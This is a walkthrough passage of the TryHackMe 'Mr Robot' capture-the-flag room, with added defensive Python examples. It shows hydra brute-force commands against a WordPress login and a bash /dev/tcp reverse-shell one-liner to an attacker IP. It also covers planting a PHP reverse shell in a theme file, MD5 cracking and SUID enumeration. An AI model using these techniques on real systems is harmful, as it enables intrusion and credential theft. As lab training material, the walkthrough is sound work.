MR Robot

Description

These are my notes for the Mr Robot CTF Room on TryHackMe.

Note: Task #1 is to deploy the machine.

OS  | Level | Rating
CTF | N/A   | 5/5

KEY LEARNINGS

tip

I think given enough of these boxes, I need to have "ON HAND AT ALL TIMES":

  • nmap lines ready
  • gobuster lines ready (also enumerate results properly)
  • key webapp testing checklist e.g. robots.txt
  • hydra lines ready
  • php reverse shell setup technique i.e. wp-admin foothold, theme editor, pentestmonkey reverse php page
  • john cracking lines ready
  • linux enumeration lines ready e.g. find suids

RECON

NMAP

the "all in one":

sudo nmap -v 10.10.235.193 -Pn -p- -sC -sV -O --min-rate=5000 -o nmap-mr_robot.txt

PORT    STATE  SERVICE  VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after: 2025-09-13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
|_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
Device type: general purpose|specialized|storage-misc|broadband router|printer|WAP
Running (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:5.4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Crestron XPanel control system (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.000 days (since Sat Apr 2 21:59:23 2022)
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros

GOBUSTER

gobuster dir -e -u http://10.10.235.193 -w /usr/share/wordlists/dirb/common.txt -o gobuster-mr_robot.txt

http://10.10.235.193/.hta                 (Status: 403) [Size: 213]
http://10.10.235.193/.htaccess (Status: 403) [Size: 218]
http://10.10.235.193/.htpasswd (Status: 403) [Size: 218]
http://10.10.235.193/0 (Status: 301) [Size: 0] [--> http://10.10.235.193/0/]
http://10.10.235.193/admin (Status: 301) [Size: 235] [--> http://10.10.235.193/admin/]
http://10.10.235.193/atom (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/atom/]
http://10.10.235.193/audio (Status: 301) [Size: 235] [--> http://10.10.235.193/audio/]
http://10.10.235.193/blog (Status: 301) [Size: 234] [--> http://10.10.235.193/blog/]
http://10.10.235.193/css (Status: 301) [Size: 233] [--> http://10.10.235.193/css/]
http://10.10.235.193/dashboard (Status: 302) [Size: 0] [--> http://10.10.235.193/wp-admin/]
http://10.10.235.193/favicon.ico (Status: 200) [Size: 0]
http://10.10.235.193/feed (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/]
http://10.10.235.193/image (Status: 301) [Size: 0] [--> http://10.10.235.193/image/]
http://10.10.235.193/Image (Status: 301) [Size: 0] [--> http://10.10.235.193/Image/]
http://10.10.235.193/images (Status: 301) [Size: 236] [--> http://10.10.235.193/images/]
http://10.10.235.193/index.html (Status: 200) [Size: 1077]
http://10.10.235.193/index.php (Status: 301) [Size: 0] [--> http://10.10.235.193/]
http://10.10.235.193/intro (Status: 200) [Size: 516314]
http://10.10.235.193/js (Status: 301) [Size: 232] [--> http://10.10.235.193/js/]
http://10.10.235.193/license (Status: 200) [Size: 309]
http://10.10.235.193/login (Status: 302) [Size: 0] [--> http://10.10.235.193/wp-login.php]
http://10.10.235.193/page1 (Status: 301) [Size: 0] [--> http://10.10.235.193/]
http://10.10.235.193/phpmyadmin (Status: 403) [Size: 94]
http://10.10.235.193/rdf (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/rdf/]
http://10.10.235.193/readme (Status: 200) [Size: 64]
http://10.10.235.193/robots (Status: 200) [Size: 41]
http://10.10.235.193/robots.txt (Status: 200) [Size: 41]
http://10.10.235.193/rss (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/]
http://10.10.235.193/rss2 (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/]
http://10.10.235.193/sitemap (Status: 200) [Size: 0]
http://10.10.235.193/sitemap.xml (Status: 200) [Size: 0]
http://10.10.235.193/video (Status: 301) [Size: 235] [--> http://10.10.235.193/video/]
http://10.10.235.193/wp-admin (Status: 301) [Size: 238] [--> http://10.10.235.193/wp-admin/]
http://10.10.235.193/wp-content (Status: 301) [Size: 240] [--> http://10.10.235.193/wp-content/]
http://10.10.235.193/wp-includes (Status: 301) [Size: 241] [--> http://10.10.235.193/wp-includes/]
http://10.10.235.193/wp-config (Status: 200) [Size: 0]
http://10.10.235.193/wp-cron (Status: 200) [Size: 0]
http://10.10.235.193/wp-links-opml (Status: 200) [Size: 227]
http://10.10.235.193/wp-login (Status: 200) [Size: 2642]
http://10.10.235.193/wp-load (Status: 200) [Size: 0]
http://10.10.235.193/wp-mail (Status: 500) [Size: 3064]
http://10.10.235.193/wp-settings (Status: 500) [Size: 0]
http://10.10.235.193/wp-signup (Status: 302) [Size: 0] [--> http://10.10.235.193/wp-login.php?action=register]
http://10.10.235.193/xmlrpc (Status: 405) [Size: 42]
http://10.10.235.193/xmlrpc.php (Status: 405) [Size: 42]
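The key-learnings list says gobuster results should be "enumerated properly" rather than eyeballed. The following is an added example (my code, not part of the original write-up or of gobuster) that parses gobuster's `-e` output format and groups the hits so the readable files and the redirects that reveal the application behind a path come out first. The sample lines are constructed in the same format as the scan above; the function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample in the format gobuster prints with -e (expanded URLs).
# The shape mirrors the scan above; sizes and paths are illustrative.
SAMPLE_GOBUSTER = """\
http://10.10.235.193/.htaccess            (Status: 403) [Size: 218]
http://10.10.235.193/admin                (Status: 301) [Size: 235] [--> http://10.10.235.193/admin/]
http://10.10.235.193/dashboard            (Status: 302) [Size: 0] [--> http://10.10.235.193/wp-admin/]
http://10.10.235.193/license              (Status: 200) [Size: 309]
http://10.10.235.193/robots.txt           (Status: 200) [Size: 41]
http://10.10.235.193/wp-login             (Status: 200) [Size: 2642]
http://10.10.235.193/xmlrpc.php           (Status: 405) [Size: 42]
"""

# url, status, size, and an optional "[--> target]" redirect suffix
LINE_RE = re.compile(
    r"^(?P<url>\S+)\s+\(Status:\s*(?P<status>\d{3})\)\s*\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s*\[--> (?P<redirect>\S+)\])?\s*$"
)


def parse_gobuster(text):
    """Return one dict per result line; lines that don't match the format are skipped."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["status"] = int(d["status"])
        d["size"] = int(d["size"])
        results.append(d)
    return results


def triage(results):
    """Group hits by status code and pull out what to look at first:
    directly readable files (200 with a non-empty body, e.g. robots.txt and
    license above) and redirects, which show where a path really leads
    (/dashboard -> /wp-admin/ is what identifies WordPress here)."""
    by_status = defaultdict(list)
    for r in results:
        by_status[r["status"]].append(r["url"])
    readable = [r["url"] for r in results if r["status"] == 200 and r["size"] > 0]
    redirects = {r["url"]: r["redirect"] for r in results if r["redirect"]}
    return {"by_status": dict(by_status), "readable": readable, "redirects": redirects}


if __name__ == "__main__":
    summary = triage(parse_gobuster(SAMPLE_GOBUSTER))
    for code, urls in sorted(summary["by_status"].items()):
        print(code, len(urls), "hits")
    print("readable:", summary["readable"])
    print("redirects:", summary["redirects"])
```

Feed it the real file with `parse_gobuster(open("gobuster-mr_robot.txt").read())`; a 200 with `Size: 0` (such as /wp-config and /wp-load above) is deliberately left out of the readable list, since an empty body usually means the PHP file ran and printed nothing rather than that it can be read.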

FLAG 1

Website running on port 80, so let's browse.

found: http://10.10.235.193/robots.txt

robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

found: http://10.10.235.193/key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9

Downloaded the fsocity.dic file.

FLAG 2

idea

use hydra + fsocity.dic file to brute force the wp-admin login page.

Brute-force

Use hydra and the fsocity.dic file to brute-force the login.

Format: hydra -l <login> -P <path/to/wordlist> <ip> <module> '/path/to/login.php:login-request&password=^PASS^:failure-message'

I use the following payload to keep the password fixed and run through the ./fsocity.dic file to find a valid username, i.e. a login that does not get "Invalid username" in the response:

payload: hydra -L ./fsocity.dic -p password 10.10.235.193 -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username'

hydra -L ./fsocity.dic -p password 10.10.235.193 -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-02 23:02:35
[DATA] max 16 tasks per 1 server, overall 16 tasks, 858235 login tries (l:858235/p:1), ~53640 tries per task
[DATA] attacking http-post-form://10.10.235.193:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username
[ATTEMPT] target 10.10.235.193 - login "true" - pass "password" - 1 of 858235 [child 0] (0/0)
[ATTEMPT] target 10.10.235.193 - login "false" - pass "password" - 2 of 858235 [child 1] (0/0)
[ATTEMPT] target 10.10.235.193 - login "wikia" - pass "password" - 3 of 858235 [child 2] (0/0)
[ATTEMPT] target 10.10.235.193 - login "from" - pass "password" - 4 of 858235 [child 3] (0/0)
[ATTEMPT] target 10.10.235.193 - login "the" - pass "password" - 5 of 858235 [child 4] (0/0)
[ATTEMPT] target 10.10.235.193 - login "now" - pass "password" - 6 of 858235 [child 5] (0/0)
[ATTEMPT] target 10.10.235.193 - login "Wikia" - pass "password" - 7 of 858235 [child 6] (0/0)
[ATTEMPT] target 10.10.235.193 - login "extensions" - pass "password" - 8 of 858235 [child 7] (0/0)
[ATTEMPT] target 10.10.235.193 - login "scss" - pass "password" - 9 of 858235 [child 8] (0/0)
[ATTEMPT] target 10.10.235.193 - login "window" - pass "password" - 10 of 858235 [child 9] (0/0)
[ATTEMPT] target 10.10.235.193 - login "http" - pass "password" - 11 of 858235 [child 10] (0/0)
[ATTEMPT] target 10.10.235.193 - login "var" - pass "password" - 12 of 858235 [child 11] (0/0)
[ATTEMPT] target 10.10.235.193 - login "page" - pass "password" - 13 of 858235 [child 12] (0/0)
[ATTEMPT] target 10.10.235.193 - login "Robot" - pass "password" - 14 of 858235 [child 13] (0/0)
[ATTEMPT] target 10.10.235.193 - login "Elliot" - pass "password" - 15 of 858235 [child 14] (0/0)
[ATTEMPT] target 10.10.235.193 - login "styles" - pass "password" - 16 of 858235 [child 15] (0/0)
[ATTEMPT] target 10.10.235.193 - login "and" - pass "password" - 17 of 858235 [child 0] (0/0)
[ATTEMPT] target 10.10.235.193 - login "document" - pass "password" - 18 of 858235 [child 1] (0/0)
[ATTEMPT] target 10.10.235.193 - login "mrrobot" - pass "password" - 19 of 858235 [child 2] (0/0)
[ATTEMPT] target 10.10.235.193 - login "com" - pass "password" - 20 of 858235 [child 3] (0/0)
[ATTEMPT] target 10.10.235.193 - login "ago" - pass "password" - 21 of 858235 [child 4] (0/0)
[ATTEMPT] target 10.10.235.193 - login "function" - pass "password" - 22 of 858235 [child 5] (0/0)
[ATTEMPT] target 10.10.235.193 - login "eps1" - pass "password" - 23 of 858235 [child 7] (0/0)
[ATTEMPT] target 10.10.235.193 - login "null" - pass "password" - 24 of 858235 [child 6] (0/0)
[ATTEMPT] target 10.10.235.193 - login "chat" - pass "password" - 25 of 858235 [child 8] (0/0)
[ATTEMPT] target 10.10.235.193 - login "user" - pass "password" - 26 of 858235 [child 9] (0/0)
[ATTEMPT] target 10.10.235.193 - login "Special" - pass "password" - 27 of 858235 [child 11] (0/0)
[ATTEMPT] target 10.10.235.193 - login "GlobalNavigation" - pass "password" - 28 of 858235 [child 10] (0/0)
[ATTEMPT] target 10.10.235.193 - login "images" - pass "password" - 29 of 858235 [child 12] (0/0)
[ATTEMPT] target 10.10.235.193 - login "net" - pass "password" - 30 of 858235 [child 13] (0/0)
[80][http-post-form] host: 10.10.235.193 login: Elliot password: password # <------ bingo!
[ATTEMPT] target 10.10.235.193 - login "push" - pass "password" - 31 of 858235 [child 14] (0/0)

Now try again, but set the username to Elliot and cycle through the ./fsocity.dic file in the password field (changing the failure message to match):

hydra -l Elliot -P ./fsocity.dic 10.10.235.193 -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:The password you entered for the username' -o hydra-password.txt

Got a valid username, but no luck on the password.
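Seen from the other side, the hydra run above is loud: 858,235 POSTs to /wp-login.php from one address, sixteen at a time. This is an added detection example (my code, not from the write-up) that finds that pattern in Apache combined-format access logs with a per-source sliding window. The log lines are constructed, the addresses are RFC 5737 documentation ranges, and the function names are my own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache combined log: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def _line(ip, when, method, path, status):
    """Build one constructed log line in Apache combined format."""
    return (f'{ip} - - [{when.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
            f'{status} 2642 "-" "Mozilla/5.0"')


_start = datetime(2022, 4, 2, 23, 2, 35, tzinfo=timezone.utc)
# Constructed sample: 16 POSTs to the login form in 16 seconds from one source
# (the shape hydra's default 16 parallel tasks produce) plus ordinary traffic
# from a second address. A failed WordPress login re-renders the form with 200;
# a successful one answers with a 302 to wp-admin.
SAMPLE_ACCESS_LOG = [
    _line("198.51.100.7", _start + timedelta(seconds=i), "POST", "/wp-login.php", 200)
    for i in range(16)
] + [
    _line("192.0.2.10", _start + timedelta(seconds=5), "GET", "/blog/", 200),
    _line("192.0.2.10", _start + timedelta(seconds=9), "POST", "/wp-login.php", 302),
]


def parse_line(line):
    """Parse one access-log line; returns None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["status"] = int(e["status"])
    return e


def detect_login_bursts(lines, path="/wp-login.php", threshold=10,
                        window=timedelta(seconds=60)):
    """Report sources that POST to `path` at least `threshold` times inside any
    `window`. Lines are assumed to be in time order per source, as a real log is.
    Returns {ip: peak number of POSTs seen inside one window}."""
    recent = defaultdict(deque)  # ip -> timestamps of recent POSTs to `path`
    peaks = {}
    for line in lines:
        e = parse_line(line)
        if e is None or e["method"] != "POST" or e["path"] != path:
            continue
        q = recent[e["ip"]]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[e["ip"]] = max(peaks.get(e["ip"], 0), len(q))
    return peaks


if __name__ == "__main__":
    for ip, count in detect_login_bursts(SAMPLE_ACCESS_LOG).items():
        print(f"login burst from {ip}: {count} POSTs within 60s")
```

Counting every POST, not only the 200s, also catches the second hydra run in the write-up (fixed username, wordlist in the password field), which produces the same request shape; a successful guess shows up as a single 302 at the end of the burst, which is the line worth pulling out during incident response.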

tip

Hint from the walkthrough: /license. Hint from THM: "white coloured font".

I look through the gobuster results again and see this http://10.10.243.224/license

I visit this page and see this:

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?

But if you inspect it, you see the hidden text:

do you want a password or something? ZWxsaW90OkVSMjgtMDY1Mgo=

Looks like base64:

442 💀 ± ➀ echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d
elliot:ER28-0652

Now, I'm thinking "PHP reverse shell" to get a foothold.

Reverse Shell

From highon.coffee

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

payload

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"10.11.55.83"/443 0>&1'");?>

This one kept loading/freezing; it may need tweaking.

n0a110w has some great notes, and from their blog I ended up using the [pentestmonkey php reverse shell](https://github.com/pentestmonkey/php-reverse-shell) (git clone https://github.com/pentestmonkey/php-reverse-shell.git).

tip

We need to be able to edit PHP source code, not HTML pages, so you need to use the editor in the Theme section. I replaced the entire footer.php file with the pentestmonkey reverse shell file.

I created a random page called shell in the WordPress add-page menu so that I know footer.php gets loaded; "view page" and you pop the shell:

443 💀 ± ➀ sudo rlwrap nc -lvrp 443
listening on [any] 443 ...
10.10.243.224: inverse host lookup failed: Unknown host
connect to [10.11.55.83] from (UNKNOWN) [10.10.243.224] 51517
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
00:09:03 up 1:45, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$
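The foothold above only works because an admin account can rewrite theme PHP from the dashboard. WordPress ships two constants for wp-config.php that remove that capability: DISALLOW_FILE_EDIT hides the theme/plugin editor and DISALLOW_FILE_MODS additionally blocks plugin and theme installs and updates from the dashboard. The following is an added example (my code, not from the write-up or from WordPress) with a constructed weak wp-config.php next to a hardened one and a small audit that reports which guard is missing. The database values are placeholders; the audit follows the WordPress rule that custom constants must sit above the line that includes wp-settings.php and ignores any define placed below it.

```python
import re

# Constructed wp-config.php fragments; credentials are placeholders.
WEAK_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'example-placeholder' );
$table_prefix = 'wp_';
require_once ABSPATH . 'wp-settings.php';
"""

HARDENED_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'example-placeholder' );
$table_prefix = 'wp_';
// Removes Appearance/Plugins editors, so footer.php cannot be rewritten from the dashboard.
define( 'DISALLOW_FILE_EDIT', true );
// Also blocks dashboard plugin/theme installs and updates (deploy those from CI instead).
define( 'DISALLOW_FILE_MODS', true );
require_once ABSPATH . 'wp-settings.php';
"""

# define( 'NAME', true|false );  (string-valued defines such as DB_NAME are ignored)
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](?P<name>\w+)['"]\s*,\s*(?P<value>true|false)\s*\)\s*;""",
    re.IGNORECASE,
)


def wp_constants(config_text):
    """Boolean constants defined before wp-settings.php is included."""
    cutoff = config_text.find("wp-settings.php")
    if cutoff == -1:
        cutoff = len(config_text)
    out = {}
    for m in DEFINE_RE.finditer(config_text, 0, cutoff):
        out[m.group("name").upper()] = m.group("value").lower() == "true"
    return out


def audit_wp_config(config_text):
    """Return hardening findings; an empty list means both guards are in place."""
    consts = wp_constants(config_text)
    findings = []
    if not consts.get("DISALLOW_FILE_EDIT", False):
        findings.append("DISALLOW_FILE_EDIT not set: theme/plugin editor available to admins")
    if not consts.get("DISALLOW_FILE_MODS", False):
        findings.append("DISALLOW_FILE_MODS not set: admins can install/update plugins and themes")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, "->", audit_wp_config(cfg) or "ok")
```

With the hardened config in place the Theme editor entry is gone from the dashboard, so a stolen admin password no longer converts directly into code execution; the brute-force and credential-reuse steps earlier in the write-up still need fixing on their own (rate limiting on wp-login.php, no passwords hidden in public pages), but the blast radius of one admin login shrinks to content edits.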

Stabilize the shell with python:

$ which python
/usr/bin/python
$ /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$

Find the flag:

ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
cd /home
ls
robot
cd robot
ls
key-2-of-3.txt password.raw-md5
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
ls -al
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
id;whoami
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon
daemon@linux:/home/robot$

found /home/robot flag, can't read flag, but can read the other file:

ls -l
total 8
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$

Crack

I copied password.raw-md5 to my local machine to crack it with john.

RxHackk 福 ~/Repos/RxHack/THM/OFFENSIVEPENTESTPATH/MR_ROBOT/crack ➀ a14b989|main⚑
458 💀 ± ➀ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt md5.hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (robot)
1g 0:00:00:02 DONE (2022-04-03 12:21) 0.4975g/s 20155p/s 20155c/s 20155C/s bonjour1..123092
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

RxHackk 福 ~/Repos/RxHack/THM/OFFENSIVEPENTESTPATH/MR_ROBOT/crack ➀ a14b989|main⚑
459 💀 ± ➀ john --show
Password files required, but none specified

RxHackk 福 ~/Repos/RxHack/THM/OFFENSIVEPENTESTPATH/MR_ROBOT/crack ➀ a14b989|main⚑
460 💀 ± ➀ john --show md5.hash
0 password hashes cracked, 2 left

RxHackk 福 ~/Repos/RxHack/THM/OFFENSIVEPENTESTPATH/MR_ROBOT/crack ➀ a14b989|main⚑
461 💀 ± ➀ john --show --format=Raw-MD5 md5.hash
robot:abcdefghijklmnopqrstuvwxyz

1 password hash cracked, 0 left
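john finishes in two seconds because the file holds an unsalted, single-round MD5: one hash per candidate word, and the same precomputed table works for every user. The following is an added example (my code, not from the write-up or from John the Ripper) that shows the same dictionary check in a few lines against the hash recovered above, with a tiny constructed wordlist standing in for rockyou.txt, and then the storage format that defeats it: a per-record random salt plus an iterated KDF (PBKDF2-HMAC-SHA256 here). The iteration count is an assumption taken from OWASP's password storage guidance; the function names are my own.

```python
import hashlib
import hmac
import os

# Hash from the box's password.raw-md5 (quoted in the write-up) and a small
# constructed wordlist standing in for rockyou.txt.
ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"
SAMPLE_WORDLIST = ["password", "123456", "bonjour1", "abcdefghijklmnopqrstuvwxyz", "letmein"]


def crack_raw_md5(target_hex, wordlist):
    """What `john --format=raw-md5` does per candidate: one MD5, one compare.
    No salt means one table serves every account; no iteration means tens of
    thousands of guesses per second on a laptop, as john's status line shows."""
    target = target_hex.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


# Hardened alternative: salted, iterated hashing. Assumption: 600,000 rounds of
# PBKDF2-HMAC-SHA256, the figure in OWASP's password storage cheat sheet.
PBKDF2_ITERATIONS = 600_000


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Store algorithm, rounds, salt and digest together so they can be verified
    later and the rounds raised over time without a schema change."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("raw-md5 recovered:", crack_raw_md5(ROBOT_HASH, SAMPLE_WORDLIST))
    record = hash_password("abcdefghijklmnopqrstuvwxyz")
    print("stored:", record)
    print("verify ok:", verify_password("abcdefghijklmnopqrstuvwxyz", record))
```

The weak password would still fall to a dictionary attack under PBKDF2 eventually, but each guess now costs 600,000 HMAC operations and has to be repeated per account, which is the difference between two seconds and a real budget; the honest fix on this box is both the KDF and not leaving the hash in a world-readable file in the user's home directory.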

privesc: user

su to the robot user and get the flag:

su - robot
abcdefghijklmnopqrstuvwxyz

id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$

FLAG 3

Back into the box via the reverse PHP page, then su to the robot user:

444 💀 ± ➀ sudo rlwrap nc -lvrp 443
listening on [any] 443 ...
10.10.77.167: inverse host lookup failed: Unknown host
connect to [10.11.55.83] from (UNKNOWN) [10.10.77.167] 56597
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
00:29:34 up 3 min, 0 users, load average: 0.35, 0.38, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
su - robot
abcdefghijklmnopqrstuvwxyz
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
robot@linux:~$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5

suids

Try finding SUID binaries:

find / -perm /4000
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
find: `/etc/ssl/private': Permission denied
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
find: `/root': Permission denied
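The list above is only useful if you know which entries are normal. An added example (my code, not from the write-up) that turns the `find / -perm /4000` output into an audit: it separates paths from the permission-denied noise, compares them against a baseline and flags anything living where a package manager never installs setuid files. The baseline set is an assumption standing in for a package manifest or golden image; the find output is the one quoted above, embedded as sample input. A helper also parses an `ls -l` line so the check can be run on a single file.

```python
# Sample input: the find output quoted in the write-up.
FIND_OUTPUT = """\
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
find: `/etc/ssl/private': Permission denied
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
find: `/root': Permission denied
"""

# Assumed baseline: setuid files expected from the distribution packages plus
# VMware tools on this kind of host. In practice derive it from the package
# database (dpkg -S / rpm -qf) or a golden image rather than by hand.
BASELINE_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
}

# Locations a package manager never populates with setuid binaries.
SUSPICIOUS_PREFIXES = ("/usr/local/", "/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/opt/")


def parse_find_output(text):
    """Split find's stdout/stderr mix into (paths, error lines)."""
    paths, errors = [], []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("find:"):
            errors.append(line)
        elif line.startswith("/"):
            paths.append(line)
    return paths, errors


def audit_suid(paths, baseline=BASELINE_SUID):
    """Return [(path, reason)] for every setuid file that needs a second look."""
    findings = []
    for p in sorted(set(paths)):
        reasons = []
        if p not in baseline:
            reasons.append("not in baseline")
        if p.startswith(SUSPICIOUS_PREFIXES):
            reasons.append("outside package-managed paths")
        if reasons:
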